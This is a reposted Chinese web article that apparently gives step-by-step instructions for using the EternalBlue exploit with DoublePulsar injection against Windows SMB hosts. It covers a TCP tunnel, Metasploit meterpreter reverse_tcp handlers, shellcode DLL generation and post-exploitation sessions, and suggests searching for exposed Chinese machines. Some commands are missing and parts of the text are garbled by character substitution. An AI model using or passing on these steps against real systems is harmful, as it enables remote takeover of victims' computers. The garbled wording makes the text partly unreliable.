作家
登录

手把手教你用永恒之蓝(Eternalblue)勒索病毒漏洞的高阶用法

作者: 来源: 2017-05-17 09:32:04 阅读 我要评论

TCP 地道

这一步须要你有公网 IP,如不雅你没有的话可以用 TCP 地道办事来代替……比如各类基于 Ngrok 的地道办事……

这里我就不教程了……你们本身弄好就行

我如今假设你们地道办事商 IP 是 123.123.123.123,给你的端口是 8888,你本地的端口也开 8888,下面一步操作的时刻记得把这些数字换成真实的。

提示

如不雅你是扫描校内网,并且校内网没有对机械互联端口做限制的话,不消 TCP 地道也是可以的,那你就把下面教程里的所有 LHOST 填你本身的网卡 IP 即可。

MSF 监听反弹端口

在 MSF 里,应用 multi/handler。

如不雅你要进击的机械是 32 位的机械:

搜刮框右边的选项选主机,输入 service:microsoft-ds os:windows country:china Enter 搜刮。

set payload windows/meterpreter/reverse_tcp

如不雅是 64 位的:

set payload windows/x64/meterpreter/reverse_tcp

然后 

DONE

LHOST 就填 127.0.0.1 就可以,因为膳绫擎我们用了地道。

最后一个 -j 是将 exploit 放在后台运行,临时可以不消管了。

你可以经由过程 jobs -l 看到所有后台义务。

生成 Shellcode DLL

在 MSF 里履行

膳绫擎的 {Payload} 换成你上个阶段用的 payload,然后 HOST 和 PORT 也要记得换,{ARCH} 如不雅是 32 位就写 x8664 位就写 x64。

你也可以分别生成两个 DLL 备用,反正以落后击到的 32 位 64 位都有可能。

然后把这两个 DLL 复制到 ~/.wine/drive_c 目次下

双倍脉冲(Doublepulsar)注入

切换到 Wine CMD 里的 FB 平台,应用 Doublepulsar

然后就按照提示一路 Enter,Proto 选 SMB,x86 照样 x64 根据目标机械选。

这一步选 2,RunDLL。

DLL 位制揭捉?根据你的文件名填,比如 C:\x86.dll 或者 C:\x64.dll,然后持续 Enter。

OSX

当你看到这个 Success 的时刻,表示注入成功。

如今切回你的 MSF 看看是不是有些 sending stage 之类的输出。

如不雅没有的话就把 DLL 的生成检查一遍看看参数有没有写对,然后再履行一遍上一步。

如不雅有输出的就输入 sessions -l 查看已经连接好的 meterpreter。

然后用 sessions -i <ID> 连上去:

OK 了!后面的我就不教了,你可以输入 help 然后 Tab 看看竽暌剐哪些敕令。然后 <command> -h 获取赞助。

然后 https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ 这里有一些根本的后渗入渗出敕令的解释。

【编辑推荐】

  1. 梭子鱼收集:为什么Locky勒索病毒异常危险?
  2. 当心!勒索病毒DXXD 2.0版来袭,黑客称只能缴纳赎金无法破解
  3. 亚信安然宣布防备WannaCry/Wcry蠕虫勒索病毒紧急公告!
  4. 应对“勒索病毒”周一开机操作指南
  5. 专家猜测第二波WannaCry勒索病毒进击即将到来!
【义务编辑:枯木 TEL:(010)68476606】



  推荐阅读

  给Java开发者的10个大数据工具和框架

MongoDB是一个基于分布式文件存储的数据库,应用C++说话编写。旨在为Web应用供给可扩大的高机能数据存储解决筹划。应用机能高低依附于数据库机能,MongoDB则长短关系数据库中功能最丰富,最像关系数据库的,跟着Mong>>>详细阅读


本文标题:手把手教你用永恒之蓝(Eternalblue)勒索病毒漏洞的高阶用法

地址:http://www.17bianji.com/lsqh/35262.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)